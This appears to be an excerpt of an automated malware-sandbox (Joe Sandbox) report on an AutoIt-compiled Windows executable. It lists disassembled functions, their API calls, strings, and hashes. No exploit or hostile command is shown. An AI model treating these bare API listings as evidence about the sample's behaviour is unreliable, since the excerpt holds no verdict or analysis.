                                                                                                                  • _wcslen.LIBCMT ref: 00B4836E
                                                                                                                  • _wcslen.LIBCMT ref: 00B48391
                                                                                                                  • _wcslen.LIBCMT ref: 00B483B4
                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00B483F2
                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00B45BF2), ref: 00B4844E
                                                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B48487
                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00B484CA
                                                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B48501
                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00B4850D
                                                                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B4851D
                                                                                                                  • DestroyIcon.USER32(?,?,?,?,?,00B45BF2), ref: 00B4852C
                                                                                                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00B48549
                                                                                                                  • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00B48555
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                  • String ID: .dll$.exe$.icl
                                                                                                                  • API String ID: 799131459-1154884017
                                                                                                                  • Opcode ID: d715f147ddeb1e808c3542c917a7239f8ea23ab65f6215d25bb5f450a37069db
                                                                                                                  • Instruction ID: cd397cb4e22b0f0b14071fcf3634657b695f0bf13e5a80974ee1d38d0fb4a5c1
                                                                                                                  • Opcode Fuzzy Hash: d715f147ddeb1e808c3542c917a7239f8ea23ab65f6215d25bb5f450a37069db
                                                                                                                  • Instruction Fuzzy Hash: 2F61B271540215BBEB14DF64CC81BBE7BACFB18B11F10468AF916DA1D1DF749A80DBA0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                  • API String ID: 0-1645009161
                                                                                                                  • Opcode ID: 9c05f5266f52a00cdd2d28e0c269e420c195890851958794ae90bf33b076a3c4
                                                                                                                  • Instruction ID: 46e1dc50821801039455887fa55f5090ce297a405bbab13f9fc536df216188aa
                                                                                                                  • Opcode Fuzzy Hash: 9c05f5266f52a00cdd2d28e0c269e420c195890851958794ae90bf33b076a3c4
                                                                                                                  • Instruction Fuzzy Hash: B481E671A04609BBDB20AFA0CD42FFE3BA9AF55300F054065FA05AB193EFB4DA51D791
                                                                                                                  APIs
                                                                                                                  • CharLowerBuffW.USER32(?,?), ref: 00B23EF8
                                                                                                                  • _wcslen.LIBCMT ref: 00B23F03
                                                                                                                  • _wcslen.LIBCMT ref: 00B23F5A
                                                                                                                  • _wcslen.LIBCMT ref: 00B23F98
                                                                                                                  • GetDriveTypeW.KERNEL32(?), ref: 00B23FD6
                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B2401E
                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B24059
                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B24087
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                  • API String ID: 1839972693-4113822522
                                                                                                                  • Opcode ID: 8e360ca61fac2cab49a841b672a1a442588c442e272e356b1e67c04c47b53641
                                                                                                                  • Instruction ID: fd1cb2d9aa4ae24eb1da25a11a5c010253143c9dc3cc7564adc1c757c122c719
                                                                                                                  • Opcode Fuzzy Hash: 8e360ca61fac2cab49a841b672a1a442588c442e272e356b1e67c04c47b53641
                                                                                                                  • Instruction Fuzzy Hash: 5571F0326042119FC310DF34D9918ABB7F8EF94B54F00896DF9AA97262EB34DE49CB51
                                                                                                                  APIs
                                                                                                                  • LoadIconW.USER32(00000063), ref: 00B15A2E
                                                                                                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00B15A40
                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00B15A57
                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00B15A6C
                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00B15A72
                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00B15A82
                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00B15A88
                                                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00B15AA9
                                                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00B15AC3
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00B15ACC
                                                                                                                  • _wcslen.LIBCMT ref: 00B15B33
                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00B15B6F
                                                                                                                  • GetDesktopWindow.USER32 ref: 00B15B75
                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00B15B7C
                                                                                                                  • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00B15BD3
                                                                                                                  • GetClientRect.USER32(?,?), ref: 00B15BE0
                                                                                                                  • PostMessageW.USER32(?,00000005,00000000,?), ref: 00B15C05
                                                                                                                  • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00B15C2F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 895679908-0
                                                                                                                  • Opcode ID: 72e7d6dbc5ed7652d98b87c97dae0d55861d390ad4ebe486226c2c8df2cd3231
                                                                                                                  • Instruction ID: 7139c281bf3fbfda2ce37bd4ae6f4f0990d1b6ada727a0e042f33ee863289f5a
                                                                                                                  • Opcode Fuzzy Hash: 72e7d6dbc5ed7652d98b87c97dae0d55861d390ad4ebe486226c2c8df2cd3231
                                                                                                                  • Instruction Fuzzy Hash: 0A716D31900B09EFDB20DFA8CE85AAEBBF5FF88B04F504558E542A35A0DB75E940CB50
                                                                                                                  APIs
                                                                                                                  • LoadCursorW.USER32(00000000,00007F89), ref: 00B2FE27
                                                                                                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 00B2FE32
                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00B2FE3D
                                                                                                                  • LoadCursorW.USER32(00000000,00007F03), ref: 00B2FE48
                                                                                                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 00B2FE53
                                                                                                                  • LoadCursorW.USER32(00000000,00007F01), ref: 00B2FE5E
                                                                                                                  • LoadCursorW.USER32(00000000,00007F81), ref: 00B2FE69
                                                                                                                  • LoadCursorW.USER32(00000000,00007F88), ref: 00B2FE74
                                                                                                                  • LoadCursorW.USER32(00000000,00007F80), ref: 00B2FE7F
                                                                                                                  • LoadCursorW.USER32(00000000,00007F86), ref: 00B2FE8A
                                                                                                                  • LoadCursorW.USER32(00000000,00007F83), ref: 00B2FE95
                                                                                                                  • LoadCursorW.USER32(00000000,00007F85), ref: 00B2FEA0
                                                                                                                  • LoadCursorW.USER32(00000000,00007F82), ref: 00B2FEAB
                                                                                                                  • LoadCursorW.USER32(00000000,00007F84), ref: 00B2FEB6
                                                                                                                  • LoadCursorW.USER32(00000000,00007F04), ref: 00B2FEC1
                                                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00B2FECC
                                                                                                                  • GetCursorInfo.USER32(?), ref: 00B2FEDC
                                                                                                                  • GetLastError.KERNEL32 ref: 00B2FF1E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3215588206-0
                                                                                                                  • Opcode ID: 1d2e3e5b2b1be1a38bc611e66f34842b2a4fdc02838c43d78cf6bb20c8171996
                                                                                                                  • Instruction ID: cd1f34d3fe8bcf3c4bfd708e9a4b11cf6cbd4cce246da4918a19cca95c312c58
                                                                                                                  • Opcode Fuzzy Hash: 1d2e3e5b2b1be1a38bc611e66f34842b2a4fdc02838c43d78cf6bb20c8171996
                                                                                                                  • Instruction Fuzzy Hash: AE4172B0D0531A6ADB109FBA9C8586EBFF8FF04714B50417AE11CE7281DB7899018E91
                                                                                                                  APIs
                                                                                                                  • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00AD00C6
                                                                                                                    • Part of subcall function 00AD00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00B8070C,00000FA0,2E95E94B,?,?,?,?,00AF23B3,000000FF), ref: 00AD011C
                                                                                                                    • Part of subcall function 00AD00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00AF23B3,000000FF), ref: 00AD0127
                                                                                                                    • Part of subcall function 00AD00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00AF23B3,000000FF), ref: 00AD0138
                                                                                                                    • Part of subcall function 00AD00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00AD014E
                                                                                                                    • Part of subcall function 00AD00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00AD015C
                                                                                                                    • Part of subcall function 00AD00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00AD016A
                                                                                                                    • Part of subcall function 00AD00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00AD0195
                                                                                                                    • Part of subcall function 00AD00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00AD01A0
                                                                                                                  • ___scrt_fastfail.LIBCMT ref: 00AD00E7
                                                                                                                    • Part of subcall function 00AD00A3: __onexit.LIBCMT ref: 00AD00A9
                                                                                                                  Strings
                                                                                                                  • kernel32.dll, xrefs: 00AD0133
                                                                                                                  • SleepConditionVariableCS, xrefs: 00AD0154
                                                                                                                  • WakeAllConditionVariable, xrefs: 00AD0162
                                                                                                                  • InitializeConditionVariable, xrefs: 00AD0148
                                                                                                                  • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00AD0122
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                  • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                  • API String ID: 66158676-1714406822
                                                                                                                  • Opcode ID: 841e508885d40425ca776be4531a6d56af3eaf1e62ac869335392d50ba01cbf3
                                                                                                                  • Instruction ID: e1419d8d0ee40cd1a0367b165758678a4a6e5fe08fa7246749a4a788627f8b77
                                                                                                                  • Opcode Fuzzy Hash: 841e508885d40425ca776be4531a6d56af3eaf1e62ac869335392d50ba01cbf3
                                                                                                                  • Instruction Fuzzy Hash: 1F21C636A457116BE7506BA4AD05F6A77E4FF05F91F01063AF806A73A1DF749D008A90
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcslen
                                                                                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                  • API String ID: 176396367-1603158881
                                                                                                                  • Opcode ID: 60ac8960748d29322920a0ffda4b230885eb5146205f7c133bf6fc5e41f17e05
                                                                                                                  • Instruction ID: f5bdc69c7165076cb5354614b47dc7de53c275a94695339af5e826792f7753f0
                                                                                                                  • Opcode Fuzzy Hash: 60ac8960748d29322920a0ffda4b230885eb5146205f7c133bf6fc5e41f17e05
                                                                                                                  • Instruction Fuzzy Hash: EAE1D632A00516ABCB149F78C4916EDBBF5FF54F10F9481A9E466B7240EB30AEC587D0
                                                                                                                  APIs
                                                                                                                  • CharLowerBuffW.USER32(00000000,00000000,00B4CC08), ref: 00B24527
                                                                                                                  • _wcslen.LIBCMT ref: 00B2453B
                                                                                                                  • _wcslen.LIBCMT ref: 00B24599
                                                                                                                  • _wcslen.LIBCMT ref: 00B245F4
                                                                                                                  • _wcslen.LIBCMT ref: 00B2463F
                                                                                                                  • _wcslen.LIBCMT ref: 00B246A7
                                                                                                                    • Part of subcall function 00ACF9F2: _wcslen.LIBCMT ref: 00ACF9FD
                                                                                                                  • GetDriveTypeW.KERNEL32(?,00B76BF0,00000061), ref: 00B24743
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                  • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                  • API String ID: 2055661098-1000479233
                                                                                                                  • Opcode ID: 0122debf9710347934cc0b46c9d8357712cba6ba4daa54b13e9a81eb3118f24e
                                                                                                                  • Instruction ID: 4a16c1f1067b016658c7f6802eb9ee8d9f00559a796c36ef8c163db5ec46439c
                                                                                                                  • Opcode Fuzzy Hash: 0122debf9710347934cc0b46c9d8357712cba6ba4daa54b13e9a81eb3118f24e
                                                                                                                  • Instruction Fuzzy Hash: CAB1E1316083229FC710DF28E991A6EB7E5EFA6720F50499DF4AAC7692D730DC44CB52
                                                                                                                  APIs
                                                                                                                  • _wcslen.LIBCMT ref: 00B3B198
                                                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B3B1B0
                                                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B3B1D4
                                                                                                                  • _wcslen.LIBCMT ref: 00B3B200
                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B3B214
                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B3B236
                                                                                                                  • _wcslen.LIBCMT ref: 00B3B332
                                                                                                                    • Part of subcall function 00B205A7: GetStdHandle.KERNEL32(000000F6), ref: 00B205C6
                                                                                                                  • _wcslen.LIBCMT ref: 00B3B34B
                                                                                                                  • _wcslen.LIBCMT ref: 00B3B366
                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B3B3B6
                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 00B3B407
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00B3B439
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00B3B44A
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00B3B45C
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00B3B46E
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00B3B4E3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2178637699-0
                                                                                                                  • Opcode ID: 85645e6e079290c6737c8cde38f48429445691f9bf5fd9ba5f8b452e488c317f
                                                                                                                  • Instruction ID: 710c50351d301172c6b6b9a91bbc6b8742a6ad4ce6bcc4cdcf19a46d9bd37808
                                                                                                                  • Opcode Fuzzy Hash: 85645e6e079290c6737c8cde38f48429445691f9bf5fd9ba5f8b452e488c317f
                                                                                                                  • Instruction Fuzzy Hash: 17F17A316042009FC724EF24C991F6EBBE5EF85710F24859DF99A9B2A6CB71EC44CB52
                                                                                                                  APIs
                                                                                                                  • GetMenuItemCount.USER32(00B81990), ref: 00AF2F8D
                                                                                                                  • GetMenuItemCount.USER32(00B81990), ref: 00AF303D
                                                                                                                  • GetCursorPos.USER32(?), ref: 00AF3081
                                                                                                                  • SetForegroundWindow.USER32(00000000), ref: 00AF308A
                                                                                                                  • TrackPopupMenuEx.USER32(00B81990,00000000,?,00000000,00000000,00000000), ref: 00AF309D
                                                                                                                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00AF30A9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 36266755-4108050209
                                                                                                                  • Opcode ID: 7bf4e87879df400d58b5937b24a9c43aa5d3bd97cff923930e4e0098f28cacb8
                                                                                                                  • Instruction ID: af09181ce2706fab7ee166c769bb169cc4a0298033688b5e49ea279bf212b5e0
                                                                                                                  • Opcode Fuzzy Hash: 7bf4e87879df400d58b5937b24a9c43aa5d3bd97cff923930e4e0098f28cacb8
                                                                                                                  • Instruction Fuzzy Hash: 19712971641209BEEB218FA4CC49FEABF78FF05764F204216F6146A1E1CBB1AD50DB90
                                                                                                                  APIs
                                                                                                                  • DestroyWindow.USER32(?,?), ref: 00B46DEB
                                                                                                                    • Part of subcall function 00AB6B57: _wcslen.LIBCMT ref: 00AB6B6A
                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00B46E5F
                                                                                                                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00B46E81
                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B46E94
                                                                                                                  • DestroyWindow.USER32(?), ref: 00B46EB5
                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00AB0000,00000000), ref: 00B46EE4
                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B46EFD
                                                                                                                  • GetDesktopWindow.USER32 ref: 00B46F16
                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00B46F1D
                                                                                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00B46F35
                                                                                                                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00B46F4D
                                                                                                                    • Part of subcall function 00AC9944: GetWindowLongW.USER32(?,000000EB), ref: 00AC9952
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                  • String ID: 0$tooltips_class32
                                                                                                                  • API String ID: 2429346358-3619404913
                                                                                                                  • Opcode ID: 1f79b88508b2967733ac5acbc48c6eeca1bac82bc664356aa33d194ba515542d
                                                                                                                  • Instruction ID: 4afd9bb602d608d40e9cc19eb6fbcea2217c58579148f0697f8b8f414513c74d
                                                                                                                  • Opcode Fuzzy Hash: 1f79b88508b2967733ac5acbc48c6eeca1bac82bc664356aa33d194ba515542d
                                                                                                                  • Instruction Fuzzy Hash: B9715974144345AFDB21CF18DC44FAABBF9FB8A704F04485DF99987261CB70AA0ADB12
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AC9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AC9BB2
                                                                                                                  • DragQueryPoint.SHELL32(?,?), ref: 00B49147
                                                                                                                    • Part of subcall function 00B47674: ClientToScreen.USER32(?,?), ref: 00B4769A
                                                                                                                    • Part of subcall function 00B47674: GetWindowRect.USER32(?,?), ref: 00B47710
                                                                                                                    • Part of subcall function 00B47674: PtInRect.USER32(?,?,00B48B89), ref: 00B47720
                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00B491B0
                                                                                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00B491BB
                                                                                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00B491DE
                                                                                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00B49225
                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00B4923E
                                                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00B49255
                                                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00B49277
                                                                                                                  • DragFinish.SHELL32(?), ref: 00B4927E
                                                                                                                  • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00B49371
